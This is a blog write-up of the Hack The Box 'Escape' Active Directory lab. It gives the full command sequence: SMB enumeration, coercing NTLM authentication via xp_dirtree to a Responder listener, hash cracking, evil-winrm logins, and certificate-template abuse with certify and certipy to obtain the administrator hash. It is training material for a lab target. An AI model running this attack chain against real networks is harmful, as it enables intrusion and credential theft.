Hack The Box – Escape (EN)

Eren Çar
escape-htb-writeup

Hello, in this writeup, I explained the solution of the Escape Hackthebox machine (AD Machine)

escape-htb-writeup


USER

sudo nmap -sV 10.10.11.202

escape-htb-writeup

Domain name: sequel.htb. Add the /etc/hosts

Check SMB

smbclient -L //10.10.11.202 -U ''

There is a pdf file. Download it.

escape-htb-writeup

The pdf file contains the SQL server Procedures.

escape-htb-writeup

And, there is a user and password on the second page

escape-htb-writeup

PublicUser:GuestUserCantWrite1

Let’s check the ms-sql server port using nmap

sudo nmap -sSV sequel.htb -p1433

escape-htb-writeup

ms-sql is open. I’ve looked in the SQL but nothing. Then I read the hacktrick. (link)

According to the hacktrick, maybe I can steal the NTLM hash. Let’s try it

1- Run the Responder. (smb and http is on)

sudo Responder -I tun0 -vwP

2- Connect the SqlServer using impacket-mssqlclient

impacket-mssqlclient sequel.htb/[email protected]

3- Run the below command in the SqlServer.

xp_dirtree '\\10.10.14.7\anan'

escape-htb-writeup

Captured the sql_svc’s ntlmv2 hash. Let’s crack it with hashcat

hashcat sql_svc-hash /usr/share/wordlists/rockyou.txt

escape-htb-writeup

sql_svc:REGGIE1234ronnie

Login as sql_svc using evil-winrm. But no user.txt in Desktop.

evil-winrm -i 10.10.11.202 -u sql_svc -p 'REGGIE1234ronnie'

escape-htb-writeup

So, must I be Ryan.Cooper for user.txt

When I reviewed the directories, I found the SQLServer directory and Logs

escape-htb-writeup

There is a password for Ryan.Cooper in ERRORLOG.BAK file

escape-htb-writeup

Ryan.Cooper:NuclearMosquito3

Now, login as Ryan.Cooper and read the user.txt

evil-winrm -i 10.10.11.202 -u Ryan.Cooper -p 'NuclearMosquito3'

escape-htb-writeup


Privilege

Now, find the vulnerable certificate template for Administrator. (Certificate Attacks)

First of all, send the certify.exe to the machine and run the below command. (Purpose, detect the certificate authority and vulnerable template)

./certify.exe find /vulnerable

certificate authority (ca) : sequel-DC-CA

template name : UserAuthentication

According to the output, run the certipy on the attack machine for administrator pfx certificate. (You can use the rubeus and similar tools)

certipy req -u [email protected] -p NuclearMosquito3 -ca sequel-DC-CA -template UserAuthentication -upn [email protected]

Then, we can get the TGT or password hash of the administrator. 

certipy auth -pfx administrator.pfx

escape-htb-writeup

administrator: aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4ee

Now, login as the administrator and read the root.txt

evil-winrm -i 10.10.11.202 -u administrator -H a52f78e4c751e5f5e17e1e9f3e58f4ee

escape-htb-writeup


Thanks for Reading


Leave a Reply

Your email address will not be published. Required fields are marked *


The reCAPTCHA verification period has expired. Please reload the page.